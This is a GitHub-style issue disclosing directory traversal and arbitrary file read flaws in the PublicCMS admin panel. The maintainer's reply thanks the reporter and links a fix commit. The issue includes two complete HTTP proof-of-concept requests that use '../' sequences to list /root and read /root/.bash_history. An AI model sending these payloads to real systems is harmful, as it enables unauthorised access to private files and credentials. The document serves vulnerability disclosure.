There is a "Directory Traversal" and "Arbitrary file read" vulnerability that can read system dir and file

Question

There is a "Directory Traversal" and "Arbitrary file read" vulnerability that can read system dir and file

jearyorg opened this issue 6 years ago · 1 comments

First you should login demo account,

Directory Traversal POC:

GET /admin/cmsWebFile/list.html?path=../../../../../root&_=1529029023591 HTTP/1.1
Host: cms.publiccms.com
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36
Referer: http://cms.publiccms.com/admin/
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: **
Connection: close

Arbitrary file read POC:

GET /admin/cmsTemplate/content.html?path=../../../../../../../../../root/.bash_history&_=1529029023587 HTTP/1.1
Host: cms.publiccms.com
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36
Referer: http://cms.publiccms.com/admin/
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: **
Connection: close

You can use these two poc brower system dir and read any file~

Answer 1 · 2018-06-20T04:31:07.000Z

4fe81a5
Thank you for finding this very serious problem